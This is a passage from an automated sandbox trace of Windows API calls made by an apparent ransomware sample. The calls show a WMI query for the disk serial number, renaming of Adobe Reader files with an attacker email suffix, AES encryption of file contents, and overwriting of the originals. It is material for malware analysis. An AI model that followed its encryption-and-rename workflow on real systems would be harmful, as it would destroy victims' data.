This=0x6024b20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0154.391] WbemLocator:IUnknown:Release (This=0x6024b20) returned 0x2 [0154.391] WbemLocator:IUnknown:Release (This=0x6024b20) returned 0x1 [0154.392] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0154.392] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0154.392] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b20, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6024b20) returned 0x0 [0154.392] WbemLocator:IUnknown:AddRef (This=0x6024b20) returned 0x3 [0154.392] WbemLocator:IUnknown:Release (This=0x6024b20) returned 0x2 [0154.392] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025d10, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0154.392] WbemDefPath:IWbemPath:GetText (in: This=0x6025d10, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0154.392] WbemDefPath:IWbemPath:GetText (in: This=0x6025d10, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0154.392] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6024ac0) returned 0x0 [0154.392] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024ac0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x6024634) returned 0x0 [0155.585] WbemLocator:IUnknown:QueryInterface (in: This=0x6024634, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b224) returned 0x0 [0155.586] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b224, pProxy=0x6024634, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0155.586] WbemLocator:IUnknown:Release (This=0xb5b224) returned 0x1 [0155.586] WbemLocator:IUnknown:QueryInterface (in: This=0x6024634, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b244) returned 0x0 [0155.586] WbemLocator:IUnknown:QueryInterface (in: This=0x6024634, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b224) returned 0x0 [0155.586] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b224, pProxy=0x6024634, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0155.586] WbemLocator:IUnknown:Release (This=0xb5b224) returned 0x2 [0155.586] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x1 [0155.586] CoTaskMemFree (pv=0xbd4a08) [0155.587] WbemLocator:IUnknown:Release (This=0x6024ac0) returned 0x0 [0155.587] WbemLocator:IUnknown:QueryInterface (in: This=0x6024634, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b244) returned 0x0 [0155.587] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0155.588] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0155.588] WbemLocator:IUnknown:AddRef (This=0xb5b244) returned 0x3 [0155.588] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0155.589] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0155.589] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b1a4) returned 0x0 [0155.589] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b1a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0155.589] WbemLocator:IUnknown:Release (This=0xb5b1a4) returned 0x3 [0155.589] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0155.589] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0155.590] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b22c) returned 0x0 [0155.590] WbemLocator:IRpcOptions:Query (in: This=0xb5b22c, pPrx=0xb5b244, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0155.590] WbemLocator:IUnknown:Release (This=0xb5b22c) returned 0x3 [0155.590] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x2 [0155.590] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0155.590] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0155.590] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x6024634) returned 0x0 [0155.590] WbemLocator:IUnknown:AddRef (This=0x6024634) returned 0x4 [0155.590] WbemLocator:IUnknown:Release (This=0x6024634) returned 0x3 [0155.590] WbemLocator:IUnknown:Release (This=0x6024634) returned 0x2 [0155.590] SysStringLen (param_1=0x0) returned 0x0 [0155.590] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025ca0, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0155.590] WbemDefPath:IWbemPath:GetText (in: This=0x6025ca0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0155.590] WbemDefPath:IWbemPath:GetText (in: This=0x6025ca0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0155.590] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0155.590] WbemLocator:IUnknown:AddRef (This=0xb5b244) returned 0x3 [0155.590] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b244, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b244) returned 0x0 [0155.591] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x3 [0155.591] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x2 [0155.591] WbemDefPath:IWbemPath:GetText (in: This=0x6025ca0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0155.591] WbemDefPath:IWbemPath:GetText (in: This=0x6025ca0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0155.591] IWbemServices:GetObject (in: This=0x6024634, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028180, ppCallResult=0x0) returned 0x0 [0156.245] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025d10, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0156.245] WbemDefPath:IWbemPath:GetText (in: This=0x6025d10, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0156.245] WbemDefPath:IWbemPath:GetText (in: This=0x6025d10, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0156.245] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3605cd8*=0, plFlavor=0x3605cdc*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3605cd8*=8, plFlavor=0x3605cdc*=0) returned 0x0 [0156.245] SysStringByteLen (bstr="9C354B42") returned 0x10 [0156.245] SysStringByteLen (bstr="9C354B42") returned 0x10 [0156.245] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3605cd8*=8, plFlavor=0x3605cdc*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3605cd8*=8, plFlavor=0x3605cdc*=0) returned 0x0 [0156.245] SysStringByteLen (bstr="9C354B42") returned 0x10 [0156.245] SysStringByteLen (bstr="9C354B42") returned 0x10 [0156.245] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0156.245] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x55 [0156.245] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0156.245] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x19aee640, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0156.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0156.246] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0156.246] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0156.246] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0156.247] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0156.247] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0156.247] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0156.247] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0156.247] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0156.247] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), fInfoLevelId=0x0, lpFileInformation=0x36061f4 | out: lpFileInformation=0x36061f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3)) returned 1 [0156.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0156.248] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0156.248] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0156.248] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0156.248] GetFileType (hFile=0x428) returned 0x1 [0156.248] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0156.248] GetFileType (hFile=0x428) returned 0x1 [0156.248] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x41e3 [0156.248] ReadFile (in: hFile=0x428, lpBuffer=0x369cb28, nNumberOfBytesToRead=0x41e3, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x369cb28*, lpNumberOfBytesRead=0x8f6eedc*=0x41e3, lpOverlapped=0x0) returned 1 [0156.250] CloseHandle (hObject=0x428) returned 1 [0156.250] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0xbe09c0) returned 1 [0156.251] CryptGenRandom (in: hProv=0xbe09c0, dwLen=0x10, pbBuffer=0x36a1060 | out: pbBuffer=0x36a1060) returned 1 [0157.091] CryptImportKey (in: hProv=0xbe09c0, pbData=0x36dcdfc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7fa90) returned 1 [0157.091] CryptContextAddRef (hProv=0xbe09c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0157.091] CryptContextAddRef (hProv=0xbe09c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0157.091] CryptDuplicateKey (in: hKey=0xb7fa90, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7f950) returned 1 [0157.091] CryptContextAddRef (hProv=0xbe09c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0157.091] CryptSetKeyParam (hKey=0xb7f950, dwParam=0x4, pbData=0x36dcedc*=0x1, dwFlags=0x0) returned 1 [0157.092] CryptSetKeyParam (hKey=0xb7f950, dwParam=0x1, pbData=0x36dcea8, dwFlags=0x0) returned 1 [0157.092] CryptEncrypt (in: hKey=0xb7f950, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36dceec*, pdwDataLen=0x8f6eea8*=0x41f0, dwBufLen=0x41f0 | out: pbData=0x36dceec*, pdwDataLen=0x8f6eea8*=0x41f0) returned 1 [0157.092] CryptEncrypt (in: hKey=0xb7f950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36e1100*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x36e1100*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0157.093] CryptDestroyKey (hKey=0xb7fa90) returned 1 [0157.093] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0157.094] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0157.094] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm", lpFilePart=0x0) returned 0x34 [0157.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0157.372] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0157.374] GetFileType (hFile=0x45c) returned 0x1 [0157.375] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0157.375] GetFileType (hFile=0x45c) returned 0x1 [0157.375] WriteFile (in: hFile=0x45c, lpBuffer=0x3777cec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x3777cec*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0157.376] CloseHandle (hObject=0x45c) returned 1 [0157.376] CoTaskMemAlloc (cb=0x20c) returned 0xbd7ce8 [0157.376] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbd7ce8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0157.376] CoTaskMemFree (pv=0xbd7ce8) [0157.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.376] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0157.377] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0157.377] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0157.377] IUnknown:Release (This=0xb51e34) returned 0x1 [0157.378] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6024b80) returned 0x0 [0157.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024b80, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0157.378] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024b80, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6026020) returned 0x0 [0157.378] WbemDefPath:IUnknown:Release (This=0x6024b80) returned 0x0 [0157.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026020, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6026020) returned 0x0 [0157.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026020, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0157.379] WbemDefPath:IUnknown:AddRef (This=0x6026020) returned 0x3 [0157.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026020, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0157.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026020, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0157.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026020, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0x66ccab8) returned 0x0 [0157.379] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccab8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, 